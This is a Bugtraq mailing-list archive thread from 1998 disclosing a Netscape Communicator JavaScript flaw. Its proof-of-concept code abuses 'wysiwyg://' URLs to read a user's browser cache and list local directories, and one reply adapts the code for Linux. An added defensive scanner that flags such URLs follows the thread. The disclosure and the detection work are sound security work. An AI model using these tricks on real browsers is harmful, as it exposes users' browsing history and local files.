Bugtraq mailing list archives
Re: Javascript bug in Netscape Communicator 4.5
From: tool () SNIPER ORG (Ryan Gray)
Date: Thu, 29 Oct 1998 17:09:23 -0600
Hello,

Just wanted to add that Netscape Communicator 4.5b2 on Slackware Linux 3.5 (kernel 2.0.34) is susceptible to this also. I was able to get the script to read my cache. As for the local reading, with a little modification, it'll do that too.

Example: the line in George's script that reads local files is -

    sl=window.open('wysiwyg://1/file:///c|/');

With just a little change, taking the Linux directory structure into consideration and adding proper backslash escapes -

    sl=window.open('wysiwyg://1/file://\/');

That'll give you a listing of '/' on the local box. (tsk, tsk, tsk)

Regards,
Ryan Gray
http://www.sniper.org - Home of the Afterlife

On Wed, 28 Oct 1998, Georgi Guninski wrote:
There is a bug in Netscape Communicator 4.5, 4.07, 3.04 under Windows 95 (probably others) which allows reading user's cache (the urls the user has visited, including the info in GET forms). Reading local directories content is also allowed. This info may be sent to an arbitrary host. The bug may be exploited by email.

Demonstration is available at:
Cache reading: http://www.geocities.com/ResearchTriangle/1711/b4.html
Directory reading: http://www.geocities.com/ResearchTriangle/1711/b5.html

The javascript code is:

    sl=window.open('wysiwyg://1/about:cache'); //For Netscape 3.04 remove 'wysiwyg://1/'
    sl2=sl.window.open();
    sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here are some links from your cache:\"; for(i=0;i<5;i++) x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";
    sl2.location.reload();

Workaround: Disable Javascript.

Regards,
Georgi Guninski
http://www.geocities.com/ResearchTriangle/1711/
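Since the report says the bug may be exploited by email, a mail or proxy filter can flag the URL pattern both messages rely on: a `wysiwyg://N/` prefix wrapped around `about:` or `file:`. The scanner below is an added example, not code from either poster; the function names, the choice of flagged schemes and the sample input are assumptions made for illustration.

```javascript
// Added example: flag quoted URLs in script/HTML text whose real target,
// after removing wysiwyg://<n>/ wrappers, is an about: or file: URL.

const SENSITIVE = new Set(['about', 'file']);

// Strip any number of leading wysiwyg://<digits>/ wrappers.
function unwrap(url) {
  let inner = url.trim();
  let depth = 0;
  const wrapper = /^wysiwyg:\/\/\d+\//i;
  while (wrapper.test(inner)) {
    inner = inner.replace(wrapper, '');
    depth++;
  }
  return { inner, depth };
}

// Return the lowercase scheme of a URL, or null if it has none.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Scan text for quoted URLs and report those resolving to a sensitive scheme.
function findWrappedLocalUrls(text) {
  const hits = [];
  const quoted = /(['"])((?:wysiwyg|about|file):[^'"]*)\1/gi;
  let m;
  while ((m = quoted.exec(text)) !== null) {
    const { inner, depth } = unwrap(m[2]);
    const scheme = schemeOf(inner);
    if (scheme && SENSITIVE.has(scheme)) {
      hits.push({ url: m[2], scheme, wrapped: depth > 0 });
    }
  }
  return hits;
}

// Constructed sample: the two window.open targets quoted in this thread
// plus one ordinary link that must not be flagged.
const sample = [
  "sl=window.open('wysiwyg://1/about:cache');",
  "sl=window.open('wysiwyg://1/file:///c|/');",
  "w=window.open('http://www.example.com/');",
].join('\n');

console.log(findWrappedLocalUrls(sample));
```

The key step is classifying the URL only after unwrapping, so a policy keyed on the outer scheme alone does not miss the inner `about:` or `file:` target.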